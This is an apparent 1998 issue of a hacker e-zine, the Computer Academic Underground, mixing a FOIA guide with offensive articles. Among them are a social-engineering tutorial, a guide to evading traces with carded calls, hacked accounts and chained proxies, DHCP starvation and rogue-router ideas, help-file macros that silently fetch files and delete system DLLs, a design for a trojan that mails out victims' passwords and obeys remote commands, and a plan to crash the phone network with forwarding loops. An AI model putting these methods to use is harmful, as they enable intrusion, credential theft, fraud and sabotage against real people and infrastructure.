_____________________________________________ / \ | ___________________________________ | | | | | | | | | | | | | | | | | | | | | _________| | | | | | / \ | | | | / \ | | | | / \ | | | |__________/ \__________| | | / | \ | | / | \ | | / | \ | | /______________|______________\ | | | | Computer Academic Underground | | | | Electronic Magazine | | Volume 3, Number 6 | | 0615.98 | \ _____________________________________________ / ############################################################################## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ============================================================================== ------------------------------------------------------------------------------ .............................................................................. Table of Contents Foreward General . Member Listing . Freedom of Information Act ultra violet . Social Engineering Bandman Hacking . Hiding Your Footprints I)ruid . DHCP Denial of Service protocol . Fun With Windows Help Files LoCoPuff . Exploit of the Month I)ruid . Netcat Trojan Update protocol Phreaking . Crashing The Phone Systems (Theory) Ellis D Local Scene . Bulletin Board Systems . 2600 Meetings . Events Closing ############################################################################## Foreward Welcome to the 2 year Anaversary issue! This E-Zine, #20, marks two years of the CAU E-Zine. Normally, a 2 year anaversary for a monthly publication would be issue number 25, however, due to some hard drive crashes and lack of contributors in the Zine's past, a few months along the line were skipped. However, Starting this month, a new numbering scheme will go into effect. Rather than this being CAU E-Zine #20, this issue will be known as Volume 3, Number 6, and the file archives will be renamed accordingly. This provides for one volume per year, issues 1 - 12. Anyway, Happy Birthday CAU E-Zine! Allright, I didn't explain it too well in last month's zine, so I'll attempt to do so now. The 'Local Scene' section was added to the zine to specifically target the 817/214/972 area codes, and to keep up to date information on local information such as BBS's, the 2600 meetings, etc. Right now, all the BBS's that I know of are listed. In the future, as more H/P oriented BBS's pop up or are found, this list will be cut to only include BBS's that relate to our community. The reason we have this new section in the zine is that the general scene in Dallas/Fort Worth is dying in my opinion, and this is just one of many attempts to keep it alive. Another attempt at keeping it alive is that I have set up the Paranor BBS once again, available through telnet and soon to be available via dialup as well. The general idea is to give the people in D/FW that choose to involve themselves in the H/P scene a sense of community. That is one thing that BBS's have, and the Net lacks. A sense of local community. This is why BBS's will never completely die. There's nothing like the feeling you get when you get home one day and check your wardialing logs and find a new dialup, and when you call it it's some underground type BBS you've never heard of or seen before. These are people in YOUR area, talking about stuff happening in YOUR area. Not a bunch of random people in an IRC channel talking about a Hacker Con out in some random state that's at least 6 hours away from you, or a phone system in Brazil that you'll probably never have access to or use anyway. This is also the reason we have started including local prefix scans in the zine again. There's nothing like the feeling you get from actually DIALING UP to a system somewhere in YOUR area, instead of telneting to it somewhere across the net. It's a feeling many of us havn't felt for quite a long time. It's something that we all need to feel again. Believe it or not, I believe that the Internet is one of the hinderances of 'old-school hacking.' The scene will never again be like it was, simply because of the fact that most people would rather jump on the net, collect their 'h4xz0r skr1ptz' and randomly blow stuff up, rather than learning about systems, how they work, and being able to dial up to a system and play with it. This saddens me, and almost makes me lose hope. I)ruid ############################################################################## General %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Member Listing (In the order in which they were brought into the CAU) Handle IRC Nick E-Mail -------------------------------------------------------------- I)ruid I}ruid druid@caughq.org ultra violet uv_ uv@caughq.org Crimson Assassin Crim crimson@caughq.org Fizban Fizban^ fizban@caughq.org Sublime _sublime_ sublime@caughq.org int3l int3l int3l@caughq.org MajestiX maJesTix majestix@caughq.org -------------------------------------------------------------- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Freedom of Information Act This little article was inspired by file 12 of 14 issue 42 vol 4 of Phrack, by Vince Niel. His article covered some basics about using the FOIA to yer advatage. When I saw this I considered making a record request to some of yer basic government agencies (ie: fbi, etc). But I wasn't too sure about the specifics, so to the local public library I went. FOIA- freedom of information act: provides access to all federal agency records, except so called sensitive parts. In which case they must inform you why they denied the specific information. If records requested contain: 1) classified national defence and foreign relations info. 2) internal agency rules and practices. 3) info that is prohibited to be disclosed buy another law. 4) trade secrets- confedential business reports. 5) inter-agency or intra-agnency communication which are subject to legal privaleges. 6) info conserning personal matters. (my guess masturbation , sex etc) 7) certain info collected for law enforcment. 8) info relating to supervision of financial institutions. 9) geological info on wells. (sorry kids I havn't a clue???) + 3 exclusions - which means, we don't know these remaining resons to withhold records. So if they don't wanna show you something they aren't going to :) *note* all these don't mean they wont give you that info, just that they are not legally binded to do so. - you can request records on ANYONE, not just your self. - applies to all records of federal agencies. - You can also request information about state records by writting to the states attorney general. - You can also request company info from the appropriate agency. (ie: Consummer Product Saftey Commision) *note* keep requests short and specific. some record request notes: - mark on both the letter + envelope "Freedom of Information Act Request". - try to be specific on records requested. It would be better to say all records pertaining to XXXXX in the last year, then , all records pertaining to XXXXX. - they (meaning the agency at hand) like to see times, places, events, subjects, and/or any other relevent info reguarding request. - I don't know for sure, but somewhere I read they don't give your request the time of day unless it is noterized. To do this just go to yer local bank and ask to get the document noterized. - keep a copy of the request just in case. If you don't recive a responce with a certain period (usually 10 working days) of time resend the request with a copy of the first stapled to it. Types of Records: Medical Financial Benefit Law Enforcement Personell Files COST- for non-commercial they carge for time + copies. (time is determined by salary of personel involed. hmm?) Generally its $.10/copy. For Non-commercial requests, agencies will not charge for the first two hours of processing, or the first 100 pages. Agencies will also not charge if costs are minimal. Gotta wonder what some multi-billion $ agencies would consider 'minimal'. If requests take more resources then what is provided freely, there is a section on the forms to state how much you are willing to spend on this request. If you request is more than what is provided freely you will be send a bill. If the processing costs more the state amount you wish to pay, then the agency will mail you a notice. NOTE- if fees are charged you may request a waiver of costs if you can prove that the records will contribute to the publics understanding of operations of activites of the governemnt. (ie:be alittle creative, school report :/ ) The Privacy Act-1974 Passed to control information collected by federal government and how it is used! Powers Granted by act: 1) the right to see records of oneself. 2) right to amend that record if it is inaccurate, irrelevant, untimley, or incomplete 3) the right to sue the governemnt for violations of the state, including permitting others to see your records, unless specifically permitted by the Act. NOTE- also prohibits the agency from maintaining info describing how an individual exercises his/her First Amendment Rights. TIME SAVER- before making a full record reqest, you are entitled to make a formal request of whether or not the agency has ANY info on you. (ie: Yo bitch yall know shyt about me? they must tell you.) - applies to "system of records" wich is a system of INDIVIDUAL's records. - might be a good idea to include a photocopy of any valid forms of ID. - under privacy act the agency is NOT required to reply within any set amount of time. COST- Under the Privacy Act an agency can charge ONLY for cost of copying records, not time spent processing request REFERENCE US GOVT manual Avail: public libs CFR-Code of Federal Regulations Avail: public libs URL: http://www.usjod.gov/ FORMS: Sorry to say between the time I gathered this info and the time I have typed it all out, I have lost my copies of the forms. The reference to the phrack issue has a crude version of one. If any one has the updated version of the request form I'd appreciate a copy. ultra violet %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Social Engineering Ok, as if you haven't already guessed, this article is on social engineering. Another, more crude way of saying this is BS-ing. If you don't know what THAT is, turn off your computer, and go watch some more Barney. In order to engineer effectivly, you have to feel comfortable talking to people, or at least make it SEEM like you are comfortable. If you are are nervous at all, the person being engineered will pick up on it, and become suspicous. This is a bad thing. People don't give information when they are suspicous. Which is, of course, your primary goal in social engineering. To get information from a person that would normally not give it to you, by pretending to be someone else, like a boss, or a collegue from another department. In this article I will give some pointers, but I can't fully instruct how to do this, as a large portion of it is in the engineer. First off, when you want information from a person, what do you do? It depends on the person you need the information from, right? Well, it's the same with social engineering. You have to consider who you are going to talk to, their job, their status, and how bored they are. For example, the more bored, and underpaid a person, the more willing to give up information they are. Someone of this type would be a janitor. Regarless of what you have heard, janitors are not always dumb, as they DO have to know everything about the buildings that they work in. They are also VERY bored, and VERY underpaid. This makes them a good person to pump for information. That is the target. You also have to think about the person that you are pretending to be. It helps to be a superior, or an extreme underling. A superior is just a person that is a higher rank than the target. It shouldn't be their boss, but a boss from another department. It is also good to be an extreme underling, because then you can appeal to the target's sense of superiority. Remeber that people like to feel good. Dealing with people that are dumber than they are make them feel good. I'd say, probably the best person to be would have to be Joe Blow from accounting, for these reasons: A. People from accounting have no idea how to use a computer, and everyone knows it. B. No one knows ANYONE from accounting. Other than Joe, you could be a temp who doesn't know anything about the computer, but was asked to do something on it, or a confused secratary. Above all, you have to pretend to be incompetent, because it is expected. Most people assume that everyone at their place of work is incompatent except them, so you won't arouse any suspicions by being dumb. The other big trick to social engineering is remembering that people work on assumptions. One large assumption, and mostly true, is that their bosses do not like to be bothered over trivial things. This is why the target is afraid of bothering him. It is better to assume that the engineer is actually who he says that he is than to irritate the boss. One other assumption is that even people who are bored don't have time to chase a phantom employee around the office. If they do, their boss will find out, and become irritated that they are using their time ineffectivly. These are just some of the key points to good engineering. The more you practice, the better you will become. I like to practice alot, even when I really don't need the information. It's just fun to try to see what info you can get. You wil be suprised at what kinds of information people will give away. And remember, if people start asking questions, just hang up the phone. It is much safer than trying to talk your way out of it. I, nor the publishers of this e-zine, are responsible for anything stupid that you might do. Bandman ############################################################################## Hacking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Hiding Your Footprints This article intends to generally educate people that don't know about two major resources that everyone should have at least minimal access to, and a few techniques in using these resources to decently cover your tracks when connecting to a dial up computer system or network, or any computer system directly connected to the Internet. Outdial - n. (owt-die-all) - any modem or PBX phone system directly connected to one or more computers on a network, allowing outgoing phone access. Outdials normally come in two flavors: global outdials, and local outdials. First the latter... A local outdial is exactly what it says, it's an outdial local to that area code, not allowing long distance calls. A global outdial will allow you to call anywhere in the world. You also have reigonal outdials, which are not seen very often, allowing calls to say, long distance, but not international calls. These are pretty rare, so I just group them in with global outdials, just that they are limited in the dialing area. Now, what are outdials useful for? If you don't have at least ONE idea in your head by this point, please stop reading this and go do something useful with your time, like learning a trade such as basket weaving, because your gonna need to make a living somehow... Let's say you have a dialup to a system, but it's not in your area, and for some reason or another you can't dial long distance. However you can dial up to the Internet, or you have access to some other regional network. If that network has outdials, or you have access to outdials on the Internet, you can connect to these outdials and dialup to that non-local indial you have that you just can't seem to dial from where you are (can we say the word 'dial' one more time?). Obviously your going to need an outdial in the target area, or a global outdial to reach the target system. Most people don't care to bother finding or hacking access to outdials much anymore because as I stated in the Forward of this month's zine, too many people only do Internet related stuff. Nobody dials up to systems anymore, they just find ones connected to the Internet. But let's say you actually wanted to find one... Where to find outdials: Ok, believe it or not, this is one of the easier things to do. Many servers that accept credit cards have... guess what? Credit card modems used to verify charges being made over the web. Now isn't that special. All you need is access to one of these servers and enough access to use one of the modems. Boom!, you have an outdial. Also, many government servers and universities have outdials, but these are usually a little hidden, and take some work to find. Ok, so let's assume you find yourself a couple of outdials, local, global, whatever. Using an outdial is sometimes a little tricky. If the machine that has the modem connected to it is say, a default linux install, you can probably use the pretty little minicom terminal program to interface with the modem. If not, try dip, tip, or some other serial port related program. If you don't know what dip and tip are, go find some man pages, and I suggest you read. A lot. And if you can't figure out how to tell if a machine has a modem connected to it, go read a FAQ or HOWTO about hooking your modem up to your UNIX machine (US Robotics's homepage has one, although now now it's on 3-Com's homepage), because I'm not going to go into it here. Let's get to the next part of this article, before I get too far into the whole modem/outdial thing. Divertor - n. (dive-err-tor) - An indial or PBX allowing outgoing phone access. Divertors are fun. Divertors are useful. Everyone should have at LEAST one available to them at all times. Ok, obviously, divertors are used to bounce, or 'divert' telephone calls, making them harder to trace, and much more anonymous than a normal phone call would be. Most divertors you simply dial into, and the provide you with a tone requiring an access code, or they just simply give you a dialtone. In any case, the point is, you end up at a dialtone. What does this mean kiddies? You guessed it, that means you can dial out once again. One simple technique that is not really diverting, is having the "0" operator dial a call for you. You dial 0, say "Please dial 555-1234 for me", and the Operator will dial 555-1234 for you. This is an easy way to get around caller id, incase the number is not accepting calls from anonymous (*67) calls. Another diverting technique is to dial 1.800.CALL.ATT and use a credit card to have them dial another number for you. All of this has been covered in previous issues of the CAU E-Zine so I'll leave it at that. There are online equivalents to divertors as well, such as WinGate servers and datapipes. Datapipes are simply port redirectors for piping data from a port on server X.X.X.X to a port on server Y.Y.Y.Y. Therefore if you telnet to a datapiped port on server X.X.X.X, it will send you to another port on server Y.Y.Y.Y. This makes for some nifty traceback dilemas. WinGate servers are basically the same thing, but allow you to define where it sends you to. Telnet to a WinGate server on port 23, and it will send you to the destination of your choice. Included in this month's zine is a simple piece of C code which allows you to set up your own datapipe's on systems that you have access too... and remember, you don't need root to bind to ports above 1024... [ EDITOR'S NOTE: This source code is contianed in the external file 'datapipe.c'. ] Now, how can all of this be used you ask? If your actually asking that, once again, stop reading this and go hit yourself in the head with a large steel monkey wrench. Let's have a scenario: Let's say you have this 'n33t0 l33t0 d14lup' that someone on IRC gave you, and it's the dialup to.. . .. the Pentagon. Or something of equal proportions and geometric perfectness. Allright, obviously you don't want to dial up directly to this system. If you do, shoot yourself now, it'll save you a LOT of prison time. Okay, here's what you do: First, you Op divert to AT&T, hiding your caller ID info. AT&T dosn't get your caller ID info, so they ask you for the phone # your calling from. Give them any # you want to be coming from, and that will show up on the next Caller ID box that recieves the AT&T call. Ok, so you card a call from AT&T to an internet service provider, and log in using a hacked ppp account. Now you have a couple of options: You can either open a web browser, go to one of those many pages that have telnet java applets and such on them, and if you can log into the system that it telnets to (a little hacking on your part may be required at this point), guess what? You have a shell. Or hell, you could just telnet to it, same thing considering it's all coming from your current IP. The web thing just tends to impress visual people. Anyhow, your at a shell, and you can telnet through a couple of WinGate servers or datapipes (data pipes are useful for this in that they can all be set up before hand to bounce you through multiple servers with one telnet command) and eventually end up at... one of your outdials. Now, with this outdial, you can either dial directly to your geometrically perfect target, or you can repeat the entire process by dialing up to another internet account. Eventually, you reach your target. There is a speed issue to all of this of course... If you go through too many slowly connected computers or slow outdials, your connection speed IS going to suffer. I consider this issue simply to be a quality issue in relation to the individual outdials, datapipes, and divertors that you have access to. Now, if you don't see the benifits of this, email me your name and address so that I can personally come to your house and beat a clue into your skull. For one, for someone to trace you, they would be tracing a phone call from your target system backwards. This ends up at the last outdial you used. From there, they would have to trace your connection on the Internet back to the last indial you used, and so forth. Switching from a phone trace to a net trace takes time, usually because access to the system that has the outdial is needed to trace that connection. Also, most small companies and non-government agencies do not have the time or money to trace you in and out of the Internet. The more you have them switch between phone traces and net traces, the harder it is going to be for them to find you. This makes it relatively safe to connect to dialups, given you do this properly. And if you are REALLY paranoid, get a laptop and go to the park with an acoustic coupler and use a payphone. Anyhow, I hope by this point you get the idea, and see the benifits of both divertors (phone and internet alike), as well as outdials and indials, and how they can be used to hide your tracks. That's my ranting for this month... Have fun. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DHCP Denail of Service Well hello once again my faithful readers. I thought I'd just babble for a paragraph or two about an idea I had on a new denial of service method. I know your thinking "oh boy that's just what the world needs... another way to bump somebody off-line". Well fear not true believer that's not the whole story. This is a way of keeping a DHCP server from setting up new clients. Kinda the way I was thinking this software would be used would be if say an organization was ticking you off and you wanted to annoy them just set this software up and walk away. Anyway here's the hole as I see it: client wakes up says "hey I ain't got no ip better get one, I'll shout on 255.255.255.255 and see who answers" then the DHCP server responds with "here is one from my pool 1.2.3.whatever, oh and here is your DNS and router and so forth". This is very trusting on both the server and client's part so there are several different ways to annoy people: 1. Take up all ip's in pool by making repeated requests for an ip. (Note before you go and hack samba methinks this would require a way of forging mac addresses). 2. Send the client a special ip and a compromised host as the router and then forward all requests to real router. (this should be a way of forcing traffic thru your compromised host for various reasons) 3. Or just feed it bad info and watch the victim squirm. (do not try this at work remember we are trained professionals) A couple of thoughts about the software: 1. Windows version (should be silent and automatic) 2. Could this even be attempted remotely? My gut says no because of the mac addresses which are not part of the tcp/ip layer and are not routed. I could be wrong tho, so prove it. Please feel free to tell me how I have it all wrong or what other mischief could be done. Remember that just because you have a cleaver doesn't make you a butcher. Protocol (the way things work) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Fun With Windows Help Files Let's face it, mostly everyone who runs Windows products trust help files... The common user trusts help files... I sometimes trust help files... Would it ever occur to you that if you clicked on a link in a help file that something BAD could happen ? *EvilGrinAndLaff* Okay, so you have a program called "winhlp32.exe" Sweet and simple. You send it a *.hlp file and it runs that help file. There is a Macro that allows you to execute files within the help file. That's great! A nice easy way for Microsoft to run other programs to hold the hands of non-technical people via a help file. But this "ease of use" can also be used to do other things. Function Layout: -------------------------------------------------------------------------- ExecFile(program[, arguments[, display-state[, topic-ID]]]) program The name of the program you want to run arguments Command-line parameters your program will use display-state Indicates HOW the program's window is shown. SW_HIDE - Hidden <---- This is the one that is important here ! SW_MINIMIZE - Minimized SW_RESTORE - I dunno . . don't care SW_SHOW - Shows (visible) SW_SHOWMAXIMIZED - Shows Maxed SW_SHOWMINIMIZED - Show Minimized SW_SHOWMINOACTIVE - I dunno . . . SW_SHOWNA - I dunno . . . SW_SHOWNOACTIVATE - I dunno . . . topic-ID Context string of Help topic to display if the program cannot run -------------------------------------------------------------------------- So, you can use the SW_HIDE flag for a few things: Run FTP and pull down a file ExecFile("ftp.exe","-s:script.scr ftp.cytware.com",SW_HIDE) Do a search for a file called "warning.txt" Run Solitare Hidden ExecFile("sol.exe","",SW_HIDE) Wait! I don't see a window... Check your task list (Alt-Ctrl-Del) Copy Windows temp folder to desktop ExecFile("xcopy.exe ", "c:\windows\temp\*.* c:\windows\desktop\tempcopy\*.* /y",SW_HIDE)) Check your desktop and look for a folder called "tempcopy" So... you are probably saying: "So, big deal." Well, I'm not gonna explain everything, but if you think about it, you have level of trust (people normally don't think of help files as being harmful), you have Network functions (hidden way to log into FTP and pull down a file), you have File functions (hidden way to copy, move or delete files), you have Execute functions (hidden processes), etc... Sounds like if you put those together you could make a help file for a product that could do some pretty cool stuff. For example: Click here for free download ExecFile("move.exe"," /y c:\windows\system\*.dll c:\recycled\*.*",SW_HIDE)) Get Free Porn Passwords ExecFile("xcopy.exe","c:\windows\*.* c:\windows\desktop\*.* /y",SW_HIDE)) Register Software ExecFile("deltree.exe"," /y c:\windows\desktop\*.*",SW_HIDE)) You get the idea. Anyway... but the point here is the SW_HIDE. These things can be done... INVISIBLE to the user! Enjoy ! LoCoPuff [ EDITOR'S NOTE: Example code and such is included in the external zipfile 'puffhelp.zip', which is included in the E-Zine package. ] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Exploit of the Month Allright, this exploit is a little old, and it's not much of an exploit, but it's funny as hell. This is a problem with vixie cron, which allows you to get around file quotas and hide files by uuencoding them and sticking them in your user crontab. This was posted to BugTraq a few months ago. The two bash scripts that are included in the zine tarball work enough to demonstrate the concept (backup your crontab), but with a little work, anyone could create a nice file hide and retrive utility to hide and retrieve multiple files by specifying the filename. I may work on that in the future... it would probably take about 10 minutes to code. But for now, have fun with the files included, named 'cron_get' and 'cron_put'. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Netcat Trojan Update An update on the [Netcat] Trojan from before: the software is now e-mailing out the victim's ip and starts automatically as well as making a serial number and sending that as well. I am working on getting some keys out of the registry and e-mailing those, as well as getting the share passwords and dial-up passwords. The only big thing I have left is getting commands from a web page to execute and a system32 beta could be out. Anyone who would like to help or has suggestions for features let me know. As it stands it goes like this: 1. Start up first time by manual means or through compromised installshield or other one-time local command run like the IE shortcut bug. 2. Create system32.reg which is a registry file that will launch system32.exe at start-up. 3. Import file, delete file. 4. Check for serial number if none randomly pick one and stick it in file either way stick in var. (will add a way to do this from a command-line option so you can change it at a later date right now tho you can send the command to delete the serial number file) 5. Get current ip and stuff in var (this will later loop until valid ip found so it will wait until the machine is online) 6. Get registry info (To Be Done, it will contain e-mail, registered name and company maybe some other stuff like ICQ # if installed and share passwords and dial-up passwords) 7. Mail everything collected (will have e-mail in system32.ini ) 8. Check for new commands (will look in ini for url to check, will parse for lines starting with * or serial#) Lines will look like this: * 0 dir /s This will make all machines execute this command everytime (0 means always) 64532 1 start www.caughq.org This will make the machine with serial number 64532 run druid's page on the default browser the first time it d/ls this line it then will stuff a 1 in a file and next time will execute only lines that match and have a number greater than 1 in second column. 9. Execute commands (can be anything in dos or windows) 10. Check online still and same ip? Yes email response and goto 8 else goto 4. One thing it would be nice to have would be the commands 'ps', 'kill', and 'renice'. I'd also like a cron type thing built in ex: 12:00am e-mail ip. Remember that just because you have a scalpel doesn't make you a surgeon. Protocol (the way things work) ############################################################################## Phreaking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Crashing The Phone Systems (Theory) 1. Introduction: This is my theory on how to crash the phone system based on an educated guess about the new features implemented within the newest phone system networks around the United States. Also this theory is based around the long distance carrier crash a while back. 2.The theory: The theory is to max out the phone switches with one feature that has been added to the public phone systems around the United States. Basically making a continuous loop around cities, state and even in other countries if they have this feature in their phone systems. 3.The plan: The plan is to use call forwarding to make a huge non-stopping loop. How is this you may ask yourself. This is simple. Lets say we had about 50 people (all have call forwarding on their line) in each some what major cities in the U.S. gather together to d o this. Here's how you would start. You get all of the people that are willing to do this into IRC and discuss what people will do. You would have to have a number list drawn up and tell who's going to forward their line to so-and-so's number for each person till you hit the end of the list. The first person on the list doesn't have a number forwarded to him and the last person on the list does not have his number forwarded to any other number, meaning there isn't a loop, so you forward the last persons number to first person's number. Once you have that done, have each person go to a pay phone and dial their number that has been forwarded and keep on the line till the phone system has crashed. So every phone that has been forward has some one calling it. So lets just say we did a small city so we have 50 people doing this on one connection of the phone system. The system would have 50 numbers that have been forwarded into a loop, then once the people start calling the lines the connection would be forwarding 50 calls to 50 different phone numbers indefinitely. I am not sure if you can have more than one person call one forward number or not. Let say you can have any number of people call that line and that we have one hundred people calling the numbers with in the loop. That would be 2 people per number and putting more stress to the connection. To do a state wide loop you would do your cities with out making a loop and the last guy on the list for each city would have to forward to the next city until there only 2 people need to make the loop and then you would make the loop by means mentioned above. To do a country loop would be almost the same as the state loop. The international loop would be the same as the country loop. Also make sure that you do Caller Id blocking on the line that you are forwarding to do a little bit of covering up. Another note would be to make a couple of small city loops that are not part of the main loop. Long distance calling card can help also by calling one and looping it several time by just calling in again and again then move on to the next calling card and repeating these steps till you come back to your first calling card and continuing the process over again. Also in real life it would take more than that to crash the system. You might want to find some people with PBX experience and have them program the PBX to help make even more calls to the forwarded numbers because PBX's usually have a lot of phone lines that can be used to dial out. If you could get enough PBXs programmed to do this task that would help you out in stressing the network. If you do find a PBX programmer see if he can also program the PBX to do the calling card looping. 4. Closing: This is just a theory on how to crash the phone systems with one new feature that has been added to a lot phone systems around the U.S. Also some other ideas of mine were added to this theory to help out the crashing of the phone system. This is just a theory and has not been proven to work and nor do I want to find out, so please do not do this and if you do, it is your responsibility not mine because I do not condone illegal conduct nor complete stupidity. Ellis D ############################################################################## Local Scene %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Bulletin Board Systems In the future, we will hopefully reduce this list to Hack/Phreak oriented BBS's ONLY, but for now, since there are so few BBS's at all, we'll just list all of them. ------------------------------- --- --- ---- ---------------------------- System Identification NPA.WC-.NUMS NOTES ------------------------------- --- --- ---- ---------------------------- A Non-BBS 972.355.9889 Bare Facts 817.284.2551 Adult Oriented Metro Line 817.429.2667 Cat Killers 817.491.3712 Node 2 817.491.3629 Chrysalis 817.540.5565 Multi-Node Chat BBS Fortress, The 817.763.5583 Frayed Ends Of Sanity 817.297.7459 Kewl Stuff 817.294.9094 Mystic Realms 817.377.4440 Metro Line 817.784.9370 Nimbus 817.246.3295 Nova Tech 972.475.3833 Paranor 817.???.???? H/P, telnet caughq.org 31337 sdf.lonestar.org 972-317-6960 Free Linux shell provider Unicorn Valley 817.534-0365 Violent in Public 972.494.1024 Hacker/Phreak Oriented Virtual Village 214.739.8328 ------------------------------- --- --- ---- ---------------------------- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 2600 Meetings First Friday of Every Month 6:00pm until 9:00pm 817 2600 Meeting 972/214 2600 Meeting North East Mall Food Court Mama's Pizza N.E. Loop 820 at N.E. Corner of Campbell Rd at Bedford Euless Rd. Preston Rd. (North Dallas) Hurst, Texas Dallas, Texas Payphone: 817.???.???? Payphone: 972.931.3850 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Events First Saturday Sidewalk Sale First Saturday of Every Month Midnight through Satuday Afternoon Ross Avenue at Pearl St Dallas, Texas ############################################################################## Closing In my opinion, this is the best zine we've had since the Christmas issue, simply because of the fact that we had so many people contribute for once. Hopefully we can keep this trend going. I regret that this month we do not have a prefix scan, but due to some technical difficulties, I have not had the resources to scan a prefix this month... this is exactly why we need other people to contribute prefix scans... I can't do them all myself. Until next month... I)ruid ############################################################################## ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground